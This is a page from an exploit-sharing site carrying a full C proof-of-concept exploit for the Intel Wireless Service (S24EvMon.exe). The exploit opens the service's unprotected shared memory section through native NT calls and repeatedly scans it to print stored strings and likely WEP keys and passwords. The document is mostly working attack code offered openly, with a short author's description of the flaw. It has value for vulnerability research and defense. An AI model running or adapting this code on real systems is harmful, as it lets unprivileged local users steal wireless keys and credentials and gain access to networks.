0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Intel Wireless Service (s24evmon.exe) Shared Memory Exploit
[===========================================================
Intel Wireless Service (s24evmon.exe) Shared Memory Exploit
===========================================================
///////////////////////////////////////////////////////////////////////
//// S24EvMon.exe Intel Wireless Management Service KEY Hunter
//// Rub?n Santamarta
//// ruben@reversemode.com
//// www.reversemode.com
//// 28/04/2006
///////////////////////////////////////////////////////////////////////
/**********************************************************************************************************
* Testing a vuln-finder application that I am developing, I found a flaw within S24EvMon.exe.
* It is a service which is part (at least) of the Intel PROset/Wireless software. This application
* is provided by Intel in order to support intel Wireless Devices based on Spectrum 24 chipsets.
*
* This service uses a shared memory section which is created without the proper security descriptor,
* allowing unprivileged users to perform operations like Delete, Read or Write into the memory. The
* section is named S24EventManagerSharedMemory
*
* This shared memory is used to store ,in plain text, confidential information like WEP Key, Passwords...
*
* The successful exploitation of this vulnerability could allow to any unprivileged user to access
* confidential information,exposing the network. An important mitigating factor is that the
* vulnerability is local, nevertheless some Malware could take advantage of this flaw.
**********************************************************************************************************/
#include <windows.h>
#include <stdio.h>
#define InitializeObjectAttributes( p, n, a, r, s ) { \
(p)->Length = sizeof( OBJECT_ATTRIBUTES ); \
(p)->RootDirectory = r; \
(p)->Attributes = a; \
(p)->ObjectName = n; \
(p)->SecurityDescriptor = s; \
(p)->SecurityQualityOfService = NULL; \
}
#define InitializeUnicodeStr(p,s) { \
(p)->Length= wcslen(s)*2; \
(p)->MaximumLength = wcslen(s)*2+2; \
(p)->Buffer = s; \
}
typedef struct _SECTION_BASIC_INFORMATION {
ULONG d000;
ULONG SectionAttributes;
LARGE_INTEGER SectionSize;
} SECTION_BASIC_INFORMATION;
typedef struct _LSA_UNICODE_STRING {
USHORT Length;
USHORT MaximumLength;
PWSTR Buffer;
} UNICODE_STRING;
typedef struct _OBJECT_ATTRIBUTES {
ULONG Length;
HANDLE RootDirectory;
UNICODE_STRING *ObjectName;
ULONG Attributes;
PVOID SecurityDescriptor;
PVOID SecurityQualityOfService;
} OBJECT_ATTRIBUTES;
typedef DWORD (WINAPI* PQUERYSECTION)(HANDLE, DWORD, PVOID,DWORD,DWORD*);
typedef DWORD (WINAPI* POPENSECTION)(HANDLE*, DWORD,OBJECT_ATTRIBUTES* );
VOID ShowError()
{
LPVOID lpMsgBuf;
FormatMessage(FORMAT_MESSAGE_ALLOCATE_BUFFER| FORMAT_MESSAGE_FROM_SYSTEM,
NULL,
GetLastError(),
MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT),
(LPTSTR) &lpMsgBuf,
0,
NULL);
MessageBoxA(0,(LPTSTR)lpMsgBuf,"Error",0);
exit(1);
}
int main(int argc, char* argv[])
{
OBJECT_ATTRIBUTES SectionAttributes;
SECTION_BASIC_INFORMATION buff;
PQUERYSECTION NtQuerySection;
POPENSECTION NtOpenSection;
char * sMap,cString[256];
UNICODE_STRING uStr;
LPVOID lpMapAddress;
DWORD i,b=0,c=0;
HANDLE hSection;
NtOpenSection = (POPENSECTION) GetProcAddress( LoadLibrary( "ntdll.dll" ),
"NtOpenSection" );
NtQuerySection = (PQUERYSECTION) GetProcAddress( LoadLibrary( "ntdll.dll"),
"NtQuerySection" );
InitializeUnicodeStr(&uStr,L"\\BaseNamedObjects\\S24EventManagerSharedMemory");
InitializeObjectAttributes(&SectionAttributes, &uStr,NULL, NULL, NULL );
NtOpenSection( &hSection, SECTION_MAP_READ|SECTION_QUERY, &SectionAttributes );
if (hSection == NULL) ShowError();
printf("Section opened successfully.\n");
lpMapAddress = MapViewOfFile(hSection, FILE_MAP_READ, 0, 0, 0);
if (lpMapAddress == NULL) ShowError();
if (NtQuerySection(hSection,0,&buff,sizeof(buff),0)) ShowError();
sMap= ( char* )lpMapAddress;
printf("Scanning section...\n\n");
while(c<100)
{
c++;
printf("\nSNAPSHOT ID[%d]----------------[BEGIN]\n\n",c);
for (i=0; i< buff.SectionSize.QuadPart; i++)
{
if( sMap[i]> 0x29 )
{
while( sMap[i] != 0x0 )
{
if( sMap[i]>=0x30 )
{
cString[b] = sMap[i];
b++;
}
i++;
}
cString[b++]='\0';
// less 3 characters should be GARBAGE
if( b>3 && b!=14 && b!=27 ) printf(" String collected: %s\n",cString);
// Alphanumeric WEP KEY (13 characters)
if( b==14 ) printf("### Possible Alphanumeric WEP KEY found: %s\n",cString);
if( b==27 )
{
if(cString[0]!=0x30 && cString[2]!=0x30 && cString[6]!=0x30)
printf("### Possible WEP KEY found(Ascii/HexMode): %s\n",cString);
else
printf(" String collected: %s\n",cString);
}
b=0;
}
}
printf("\nSNAPSHOT ID[%d]----------------[END]\n",c);
Sleep(1000);
}
CloseHandle(hSection);
return 0;
}
# 0day.today [2024-11-16] #